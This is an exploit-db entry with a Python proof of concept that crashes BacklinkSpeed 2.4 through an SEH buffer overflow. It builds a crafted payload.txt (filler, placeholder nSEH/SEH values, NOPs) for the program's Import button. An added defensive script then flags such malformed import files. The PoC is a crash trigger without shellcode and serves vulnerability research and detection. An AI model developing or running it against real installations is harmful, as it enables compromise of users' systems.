BacklinkSpeed 2.4 – Buffer Overflow PoC (SEH)

  • Author: Saeed reza Zamanian
    Date: 2020-08-03
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/48726/
  • # Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
    # Date: 2020-08-01
    # Exploit Author: Saeed reza Zamanian
    # Vendor Homepage: http://www.dummysoftware.com
    # Software Link: http://www.dummysoftware.com/backlinkspeed.html
    # Version: 2.4
    # Tested on: 
    	Windows 10.0 x64 Build 10240
    	Windows 7 x64
    	Windows Vista x32 SP1
    # Replicate Crash:
    1) Install and run the application
    2) Run the exploit; it creates a text file named payload.txt
    3) Press the Import button and open payload.txt
    
    #!/usr/bin/python
    '''
    
        |----------------------------------|
        | SEH chain of thread 00000350     |
        | Address    SE handler            |
        | 42424242   *** CORRUPT ENTRY *** |
        |                                  |
        | EIP : 43434343                   |
        |----------------------------------|
    '''
    
    nSEH = "BBBB"
    SEH = "CCCC"
    payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH
    
    try:
        # Write the crash trigger to payload.txt for the import step above.
        f = open("payload.txt", "w")
        print("[+] Creating %s bytes payload." % len(payload))
        f.write(payload)
        f.close()
        print("[+] File created!")
    except Exception:
        print("File cannot be created.")
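
A defender-side check for the kind of import file this PoC writes, as an added example that is not part of the original exploit-db entry: it flags text files with over-long lines, long single-byte runs or non-printable bytes before they are opened in the application. The function name, the thresholds `MAX_LINE` and `MAX_RUN`, and the sample URL list are assumptions, not values from the vendor.

```python
import re

MAX_LINE = 2048  # assumed limit for one line of an import list
MAX_RUN = 256    # assumed limit for one byte repeated back to back


def inspect_import_file(data: bytes) -> dict:
    """Measure an import file and list the reasons it looks malformed."""
    lines = data.splitlines() or [b""]
    longest_line = max(len(line) for line in lines)
    # Longest run of one repeated byte, such as the "A" filler in the PoC.
    runs = re.finditer(rb"(.)\1*", data, re.DOTALL)
    longest_run = max((len(m.group(0)) for m in runs), default=0)
    # Anything outside printable ASCII, tab, CR and LF is unexpected in a text list.
    non_printable = sum(1 for b in data if not (32 <= b < 127 or b in (9, 10, 13)))

    reasons = []
    if longest_line > MAX_LINE:
        reasons.append("line of %d bytes exceeds %d" % (longest_line, MAX_LINE))
    if longest_run > MAX_RUN:
        reasons.append("run of %d identical bytes exceeds %d" % (longest_run, MAX_RUN))
    if non_printable:
        reasons.append("%d non-printable bytes" % non_printable)
    return {
        "longest_line": longest_line,
        "longest_run": longest_run,
        "non_printable": non_printable,
        "reasons": reasons,
    }


# Constructed samples: the first has the same layout as the PoC's payload.txt,
# the second is an ordinary URL list (hypothetical contents).
POC_LAYOUT = b"A" * 5000 + b"BBBB" + b"\x90" * 8 + b"CCCC"
URL_LIST = b"http://example.com/a\r\nhttp://example.org/b\r\n"

if __name__ == "__main__":
    for name, sample in (("poc layout", POC_LAYOUT), ("url list", URL_LIST)):
        report = inspect_import_file(sample)
        verdict = "REJECT" if report["reasons"] else "ok"
        print(name, verdict, report["reasons"])
```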